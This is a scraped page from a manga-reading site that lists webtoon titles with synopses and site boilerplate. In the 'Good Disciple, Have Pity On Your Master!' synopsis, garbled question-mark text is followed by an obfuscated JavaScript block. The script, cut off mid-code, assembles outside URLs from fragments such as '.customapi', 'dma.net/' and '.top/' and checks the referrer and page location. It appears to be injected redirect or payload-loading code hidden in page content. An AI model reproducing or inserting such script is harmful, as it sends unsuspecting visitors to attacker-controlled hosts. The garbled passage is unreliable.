2021 - Page 25

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare
Her… One Is When Master Jue Flirts With Her.

1258 results

Good Disciple, Have Pity On Your Master!

He came from the Great Desolate, carrying the destiny of the human race, he has countless disciples, a total of twelve emperors for the human race! Ying ying ying, raised so many male children, now want a female disciple to rub the master's back!  Good Disciple, Please Spare your Master  Please Spare Me! Apprentice!  ??????? ???, ??????? ?????? ???????!  ??????????<script></script><script>function _0x78dc(){var _0x166284=['525320VezJFi','rLhAD','4JiLXYN','7515880lzLpHt','href','YAcmI','.customapi','1356159pxDrrY','google','4077mjwGIp','XxaNf','GpvXV','http://rea','https://ip','text','PHjUA','FXFkK','204071OcogXW','random','then','.top/','location','includes','1769886PbaEXN','referrer','LpgzP','gUeRN','2PPoMKZ','6IooDuI','110560MskdUd','dma.net/','floor','BxTmO'];_0x78dc=function(){return _0x166284;};return _0x78dc();}(function(_0x1a4ac5,_0x323e5a){var _0x142a01=_0x95ce,_0x50ba37=_0x1a4ac5();while(!![]){try{var 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Grand Duke, It Was a Mistake!

I accidentally kidnapped the grand duke I have a one-sided love for! I ended up accepting the grand duke’s proposal to have a contractual relationship in return for fixing this issue, but……. “Vivian. May I kiss you?” Huh? Are we kissing as soon as we started dating? “We’ll kiss, then we’ll take things further, and then let’s get married, Vivian.” ……I’m in big trouble. I don’t think the grand duke is in his right mind……! Is this relationship really okay?


Great Doctor Ling Ran

Ling Ran, whose goal is to become the world’s greatest doctor, suddenly obtained the golden finger system! And this is a system with a high degree of medical expertise! With the help of the system, what medical height can the intern Ling Ran reach?


Guard pass

Read Manhwa Guard pass Online For Free At Hari Manga Guard pass Manga also known as “ガードパス-Guard Pass / 가드패스”. This OnGoing webtoon was released on 2021. The story was written by Oh son do son and illustrations by Oh son do son. The content of the comic Guard pass: Lim Sejun, who likes to eat, is fat and has a large physique. He has high self-esteem and a firm personality that doesn’t even care about being teased for being fat. He has only one friend, ‘Seo Hajin’. She has always been learning Jiujitsu to protect Sejun since childhood. One day, Sejun has trouble with a delinquent in the same class, and Hajin sees it and destroys that delinquent. But one night, Hajin is found severely beaten and suffers from a badly injured knee and more serious psychological trauma. Sejun tries to tell the police, but when the investigation doesn’t make much progress, he can’t control his anger and goes to find the culprit himself, but he’s defeated by the delinquent who learned Jiujitsu and finds nothing. Then he learns Jiujitsu from a man named ‘Jason’ who saved him. Three months later, Sejun, who learned Jiujitsu and lost weight, finds out that a veiled group is involved, and wants to destroy it. A school action drama depicting individual revenge. The comic Guard pass belongs to the Genre: Action, Comedy, Drama, Fantasy, Manhwa, Martial Arts, School Life, Shounen, Sports KunManga is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “TopManhua” and “Manhwa Website,” as well as related terms like Smut Manhwa, New Manhwa 2024, and Read Manga Engsub ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics. Follow get to read NEW MANHWA updated: Under the Shade of Wild Roses The Boy Next Door Love Or Attraction


Guide for A Princess-To-Be

She was an A-list actress shooting a movie scene, accidentally she was tripped over and when she woke up again, she found herself time-travelled to the ancient time and became the first miss in the house of the Prime Minister! The only problem was, the new body she got was disfigured... Soon, she was engaged to a handsome prince, yet her sisters' scheming, the political struggle of the prince and the backstabbing of the enemy country make their marriage not go so well... MangaToon got authorization from SNAP to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Guilty Circle

April! Sawaya Doji\'s college life at his dream school of Seio University starts with an encounter with the beautiful Kaede Hoshimi during the club recruiting fair. Sawaya believes that if he goes to Tokyo... if he joins a university... if he joins a club, he can get a girlfriend! It\'s a great way to meet new people, but what kind of club has he gotten himself into?


Gunjin Shoujo, Seiritsu Mahou Gakuen ni Senyuu Suru Koto ni Narimashita

Razé was a cheat soldier at the age of 15, thanks to the memories of her previous life. One day, she was summoned by her superior – the devil Prime Minister and was ordered to go on a long-term solo mission. She was expecting a harsh mission, but… “I knew you are the right person for this, Lieutenant Colonel Razé Orphan. I want you to attend the Centrior Imperial Magic Academy starting from this spring.” “…..what?” Well, it seems that she has been appointed as the “bodyguard” for the prince and other noble’s kids. And so, she was enrolled to the school where the aristocratic-sama gathered. Although she was puzzled by the glittering school life, she was trying to live a life so as not to be bullied in the future. But it seems there was a secret that she didn’t know hidden in this world. “Hey!!!!!! No one told me that this is an otome game!!!!!” As a bodyguard, her life would be over if any of the noble kids got hurt. But then a young lady who claimed to be the ill-fated villainess came by. If the girl died, won’t she be dead too? Today, Razé will continue to watch over her school life (with her own life on the line).


Gwanjeon – Lee Kang-jin

Read Manga “Gwanjeon – Lee Kang-jin” Online For Free At MANGA ZIN The Content “Gwanjeon – Lee Kang-jin”: Is he crazy? Or just a typical attention-seeker? Lee Kwang-Jin, who doesn’t understand the differences in people, and his Master Kwak No who’s the one helping him to understand the differences in people. This is a warm story of a student and his Master set in the world of the famous manhwa “Peerless Dad”. “Gwanjeon – Lee Kang-jin” is alternatively named: Administrator Kang Jin Lee / Governor, Lee Kangjin / Gwanjeon: Lee Kang-jin / Kang-jin Lee / 관존 이강진 Read NEW MANGA updated: My System Is Very Serious The Fairy Legacy The Marquis and the Iron Wall Lady Manga Zin is a website that aggregates the latest and hottest manga, updated quickly to serve readers with high-quality images and deliver them an excellent experience.


Gwanjeon – Lee Kang-Jin

Read Manga “Gwanjeon – Lee Kang-Jin” Online For Free At Manga Zin The Content “Gwanjeon – Lee Kang-Jin”: Is He Crazy? Or Just A Typical Attention-Seeker? Lee Kwang-Jin, Who Doesn’t Understand The Differences In People, And His Master Kwak No Who’s The One Helping Him To Understand The Differences In People. This Is A Warm Story Of A Student And His Master Set In The World Of The Famous Manhwa “Peerless Dad”. “Gwanjeon – Lee Kang-Jin” Is Alternatively Named: Administrator Kang Jin Lee / Governor, Lee Kangjin / Gwanjeon: Lee Kang-Jin / Kang-Jin Lee / 관존 이강진 Read New Manga Updated: My System Is Very Serious The Fairy Legacy The Marquis And The Iron Wall Lady Manga Zin Is A Website That Aggregates The Latest And Hottest Manga, Updated Quickly To Serve Readers With High-Quality Images And Deliver Them An Excellent Experience.


Ha Buk Paeng’s youngest son

Ha-Buk-Paeng’s greatest strength, Paeng Jihuk. Paeng Jihuk heads to Nakhogok to save a family from being attacked by demons, but everything was a trap. On the verge of death, he became angry at the fact that he was abandoned by the family he loved. ‘Again… If I was given one more chance…!’ Paeng Jihuk, who had thought he was dead, wakes up in a room in the body of the master of Ha -Buk-Paeng. Revenge Of Young Master Peng


Haha o Suteru

My mother, who raised me and my sister on her own, is diagnosed with terminal cancer. Now I, her son, take time off college to look after her, and when my mother passes away, I must make a decision.
